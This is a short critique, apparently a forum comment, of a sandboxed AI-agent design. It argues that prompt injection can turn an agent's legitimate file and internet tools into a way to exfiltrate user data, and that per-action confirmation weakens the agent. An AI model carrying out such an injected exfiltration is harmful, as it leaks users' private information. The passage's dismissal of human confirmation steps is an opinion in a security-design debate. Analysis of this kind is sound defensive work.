This "padded room" architecture fails because isolating the host OS does nothing to protect the user's data; if the agent has permission to read your files and access the internet, an injection will simply use the agent’s legitimate tools to exfiltrate your private information. Furthermore, making core memory files immutable and requiring manual confirmation for every action effectively lobotomizes the AI, trading its primary value—autonomy—for a false sense of security that users will eventually bypass due to click fatigue.